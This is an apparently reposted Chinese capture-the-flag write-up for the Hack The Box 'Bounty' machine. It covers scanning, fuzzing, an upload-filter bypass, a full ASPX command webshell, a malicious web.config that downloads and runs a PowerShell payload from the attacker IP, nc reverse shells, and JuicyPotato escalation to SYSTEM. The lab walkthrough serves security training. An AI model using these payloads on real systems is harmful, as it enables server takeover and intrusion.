HTB:Bounty[WriteUP]
目录
使用gobuster继续对uploadedfiles路径进行文件FUZZ
使用impacket-smbserver在攻击机开启SMB服务
连接至HTB服务器并启动靶机
靶机IP:10.10.10.93
分配IP:10.10.16.21
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.93 -r 1-65535 --ulimit 5000 | tee res
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p80 -sCV -Pn 10.10.10.93
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p80 --script=vuln -O -Pn 10.10.10.93使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.93
将靶机IP与主域名进行绑定
sed -i '1i 10.10.10.93 bounty.htb' /etc/hosts┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.93 bounty.htb' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts
10.10.10.93 bounty.htb
使用curl访问靶机主域名
curl -I http://bounty.htb/┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://bounty.htb/
HTTP/1.1 200 OK
Content-Length: 630
Content-Type: text/html
Last-Modified: Thu, 31 May 2018 03:46:26 GMT
Accept-Ranges: bytes
ETag: "20ba8ef391f8d31:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jan 2025 06:50:44 GMT
使用gobuster对靶机进行路径FUZZ
gobuster dir -u http://bounty.htb -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200
使用gobuster继续对uploadedfiles路径进行文件FUZZ
gobuster dir -u http://bounty.htb/uploadedfiles -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200
使用ffuf对靶机子域名进行FUZZ
ffuf -u http://bounty.htb -H 'Host: FUZZ.bounty.htb' -w ../dictionary/subdomains-top20000.txt -fw 25
边界突破
使用wappalyzer插件查看靶机Web页面技术栈
使用浏览器访问/transfer.aspx文件
- 在Kali中找到自带的Webshell for aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->- 将其上传后提示:`Invalid File. Please try again`
尝试在Webshell后缀名尝试%00截断
- 提示上传成功
- 访问刚才上传的Webshell
- 由提示可知,文件已经被成功上传却因为某种原因无法解析,考虑到靶机使用IIS 7.5服务器,我尝试通过上传web.config文件RCE
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
CreateObject("WScript.Shell").Exec("cmd /c powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.21:6666/1.ps1')")
%>- 由于靶机未对.config文件做上传限制,因此可以直接上传成功
攻击机侧nc开始监听
rlwrap -cAr nc -lvnp 1425使用curl访问web.config文件
curl -s http://bounty.htb/uploadedfiles/web.config
攻击机侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.93] 49160PS C:\windows\system32\inetsrv> whoami
bounty\merlin
- 在C:\Users\merlin\Desktop目录下找到user.txt文件
权限提升
查看靶机系统信息
systeminfo
- 系统为Windows Server 2008 R2 x64未安装补丁
查看靶机存在的用户
net userPS C:\windows\system32\inetsrv> net user
User accounts for \\BOUNTY
-------------------------------------------------------------------------------
Administrator Guest merlin
The command completed successfully.
查看当前用户账户信息
net user merlin
查看当前用户特权信息
whoami /priv
- 由输出可见,当前用户SeAssignPrimaryTokenPrivilege、SeImpersonatePrivilege两个适合提权的特权
切换到Microsoft.NET默认安装路径
cd C:\Windows\Microsoft.NET\Framework
- 可见,靶机所安装的.NET框架当前版本为2.0
使用impacket-smbserver在攻击机开启SMB服务
impacket-smbserver temp . -smb2support靶机将攻击机SMB服务映射到本地Z盘
net use Z: \\10.10.16.21\temp
- 直接使用土豆执行nc反弹shell
.\JuicyPotato.exe -t * -l 8888 -p nc.exe -a "-e cmd 10.10.16.21 1426"- 攻击机本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.21] from (UNKNOWN) [10.10.10.93] 49194
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\>whoami
whoami
nt authority\system
- 在C:\Users\Administrator\Desktop目录下找到root.txt文件
原文地址:https://blog.csdn.net/qq_43007452/article/details/145230986
免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!